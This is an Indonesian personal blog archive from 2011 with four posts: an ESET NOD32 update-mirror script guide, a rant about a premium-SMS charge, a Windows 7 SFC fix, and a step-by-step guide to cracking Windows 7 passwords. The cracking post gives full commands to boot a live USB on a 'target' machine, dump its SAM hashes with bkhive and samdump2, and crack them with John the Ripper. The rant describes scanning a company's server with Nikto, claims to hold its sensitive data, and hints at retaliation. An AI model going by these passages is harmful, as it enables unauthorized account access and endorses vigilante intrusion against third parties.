Archive for July, 2011

Membuat Mirror Update ESET NOD32 Versi 4 di Linux (Shell/Bash)

Kedengarannya agak nyeleneh memang. Membuat mirror update Antivirus di Linux, tapi yang menggunakan update tersebut Komputer Windows (Walaupun ada juga ESET untuk Linux). Tapi memang begitulah, kadang kita membutuhkan bantuan Linux untuk membantu Windows. Pada tutorial kali ini saya akan memasang script di Webhosting. Sehingga nantinya bisa diakses oleh siapa saja. Sejauh ini saya baru menemukan 3 buah bahasa pemrograman untuk membuat update mirror ESET NOD32, yaitu : shell/bash, PHP dan Ruby. Sebenarnya kita bisa menggunakan Bahasa pemrograman apa saja untuk membuat mirror ini. Ketiga script bahasa pemrograman tersebut nantinya akan saya bahas semua nya, tapi untuk pemanasan, saya akan membahas yang menggunakan Shell terlebih dahulu.

Adapun Kelebihan dan kekurangan script ini dibandingkan dengan script PHP & Ruby adalah.

Kelebihan :

  • Langsung bisa dijalankan, hanya tinggal setting Crontab.
  • Ringan dan lebih cepat dibanding PHP dan Ruby (menurut saya ini lho), Karena trik download menggunakan WGET.
  • Hampir bisa dijalankan di semua Webhosting yang menggunakan OS Linux.
Kekurangan :
  • Belum bisa terintegrasi dengan database. (Mudah-mudahan di versi berikutnya bisa terintegrasi dengan Database, supaya mudah dalam perubahan Username dan Password).
  • Belum support notifikasi lewat Email & SMS jika update berhasil atau gagal. (Mudah-mudahan di versi berikutnya fitur ini sudah didukung, karena yang versi PHP sudah saya tambahkan kedua fitur ini).
  • Hanya jalan di Linux (Lha wong judulnya juga bikin di Linux :D). Tapi versi PHP dan Ruby bisa jalan di Windows.
  • Belum bisa cek Expired Date Username. (di versi PHP sudah saya tambahkan fitur ini).
Okey, sekarang hal-hal yang perlu disiapkan atau dibutuhkan.
  • Langganan Webhosting dengan Bandwidth Unlimited dan OS Linux (tentunya) atau bisa di coba di PC Linux.
  • Jika dipasang di Webhosting, Free Space di Webhosting minimal 200MB (Karena kita akan Download semua module update dan semua versi termasuk Business Edition 32 & 64 bit, Smart Security 32 & 64 bit dan support bahasa).
  • Sedikit pengetahuan tentang programming, Linux dan cPanel.
  • Jika menggunakan Webhosting, sebaiknya menggunakan cPanel.
  • Download aplikasi unrar. Nanti akan digunakan untuk melakukan ekstrak file update.ver.
Kita mulai dengan download scriptnya di bagian bawah dan jangan lupa download juga aplikasi unrar, kemudian ekstrak kedu file tersebut. Langkah demi langkah yang saya lakukan untuk memasang script adalah sebagai berikut :
  • Buat direktori baru di /home/nama_user. Beri nama direktori tersebut dengan nama “bin”, sehingga nanti akan muncul direktori
/home/nama_user/bin.
  • Upload file nodupdate.sh dan unrar ke direktori /home/nama_user/bin.
  • Lakukan chmod/permission kepada kedua file tersebut menjadi 755 lewat file manager.
  • Buat direktori baru lagi di /home/nama_user/public_html. Beri nama direktori tersebut dengan nama “nod_upd”, sehingga akan ada direktori baru, yaitu
/home/nama_user/public_html/nod_upd.
  • Buatlah Crontab/Cron Job sesuai dengan kebutuhan anda. (Saya menggunakan interval eksekusi setiap 30 menit). Pada saat debugging, mungkin pada awalnya kita bisa mengeset sesuai keinginan kita.

Cron Job

  • Cek apakah file update sudah terbentuk di :
/home/nama_user/public_html/download

  • Jika masih gagal, cek Log file. Disitu ada keterangan kenapa gagal. Log file ini saya taruh di
/home/nama_user/tmp/nodsh.log.

Jangan lupa ganti yuor_name atau nama_user dengan nama yang digunakan untuk login di cPanel, dengan Hasil dari tutorial ini bisa anda lihat pada website http://smart-ics.com/nod_upd. Anda bisa mencoba untuk melakukan update ESET anda ke link tersebut (mumpung masih saya open :D).

File-file yang di butuhkan (download) :
   – Bug fixed, Penambahan parameter (-y) pada saat ekstrak.
Script diatas saya peroleh dari forum http://ashus.ashus.net/viewtopic.php?f=16&t=68 dengan beberapa perubahan sesuai dengan kebutuhan saya. Anda juga diperkenankan untuk mengubahnya sendiri sesuai dengan keinginan anda.
Terima kasih banyak saya ucapkan kepada saudara Ashus yang telah memberi banyak inspirasi 😀
Advertisements

Indosat IM3 Laknatullah Alaih

Kemarin siang saya baru sadar jika SMS yang dikirim dari IM3 merupakan layanan premium yang membuat pulsa saya di sunat 2000 per SMS (setiap hari 2 SMS). Pen-dzoliman ini sebenarnya sudah terjadi mulai tanggal 4 Juli. Tapi baru kemarin (16 Juli) saya sadar akan adanya kegiatan pen-dzoliman ini karena saya  jarang cek pulsa.

Saya baru berhasil melakukan UNREG tadi pagi jam 06:30-an setelah mendapatkan SMS yang sama. Total Pulsa saya yang disunat adalah 56.000 (2 sms x 2000 rb x 14 hari). Setelah saya cek histori SMS pada tanggal 3 Juli dan 4 Juli 2011, ternyata ada SMS yang berbunyi :

Terimakasih. Cek Kecocokan Cintamu dengan LoveMeter. Bonus Wallpaper keren. Raih Motor, Laptop, BB, Ipod dll. Tarif Rp. 2rb/sms 2x/hari. Stop:UNERG LOV ke 9600. CS: 021-70288683.

SMS tersebut tertanggal 3 Juli 2011 jam 05:55 dan 4 Juli 2011 Jam 3:25

Mana mungkin saya melakukan registrasi 2 kali untuk layanan sampah semacam ini? Pada tanggal 15 Juli 2011 jam sekitar jam 2 siang saya telpon Contact Center Indosat (100). Jawaban yang diberikan sangat tidak memuaskan dan menjengkelkan.

Maaf pak, saat ini kami sedang melakukan maintenance jaringan sehingga tidak bisa membuka status Kartu bapak.

Nah lho… Bagai buah simalakama (padahal belum pernah liat buahnya :D). Jika saya tidak segera melakukan UNREG maka pulsa saya akan terus terkuras. Kalau saya tidak melakukan pengisian pulsa, saya tidak bisa menghubungi orang lain. WTF, Indosat Laknatullah alaih ini tidak bisa memberi solusi sama sekali. Kemudian besoknya saya mencoba untuk menghubungi Contact Center yang ada pada SMS tersebut (021-70288683). Apa jawabannya? Jawabannya adalah :

Mailbox Telkom Flexi !

Ternyata Provider SMS premium ini juga lepas tangan. Iseng-iseng saya mencoba trace Kepemilikan IP Address yang saya dapat dari link SMS LoveMeter. IP Address tersebut (202.78.200.172) adalah milik PT Graha Sarana Data. Tapi perusahaan tersebut adalah hanya penyedia layanan server, bukan provider yang saya cari. Ide usil pun muncul, okey, kita trace aja pake Nikto. Nah, disini saya mendapatkan sangat banyak informasi. Bahwa perusahaan (Provider) biang kerok dari semua pen-dzoliman ini adalah PT. BrainCode Solution yang beralamat di Pondok Gede, Kelurahaan Lubang Buaya (Deket banget dengan tempat tinggal saya, cuman 7 menitan kalo naik motor). Semua informasi dari Perusahaan ini sudah saya dapat. Bahkan data2 sensitif mereka juga sudah saya pegang. Tinggal menunggu waktu beraksi.

56 ribu saya amblas nggak masalah, tapi dapet mainan baru. 😀

My Computer Properties Tidak Bisa dibuka pada WIndows 7

My Computer Properties atau System, atau bisa dibuka juga menggunakan Win + Pause/Break adalah menu untuk melihat Informasi tentang komputer kita. Jika menu ini tidak bisa dibuka, kemungkinan ada file yang corrupt. Untuk mengembalikannya seperti semula kita bisa menggunakan System File Checking (SFC), coba lakukan langkah berikut :

  • Siapkan DVD installer Windows 7 dan masukkan ke DVD-Rom.
  • Buka Command Prompt ( Win+R –> cmd).
  • Setelah muncul jendela Command Promtp, ketik :
sfc /scannow
SFC ini akan mengecek semua file system Windwos, jika ada file yang corrupt maka akan digantikan dengan file yang ada pada DVD Installer. Tunggu sampai proses selesai dan restart komputer.

Catatan :

Bisa juga menggunakan ISO/Image Windows 7, yang perlu dilakukan hanya melakukan mount file ISO tersebut menggunakan software seperti WinMount, Daemon Tool, Virtual Drive dll.

Selamat mencoba.

Cracking Password Windows 7

Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.

Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.

Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.

Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :

root@root: ~#

Kemudian ketik :

root@root: ~# startx

Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.

root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk

sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:

root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt

File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.

root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7

Cracking Password Win7

Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.

Cracking Password Win7 Tanpa Parameter Charset

Cracking Password Win7 Tanpa Parameter Charset

Tanpa charset alnum:

root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt

Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.

Advertisements
%d bloggers like this: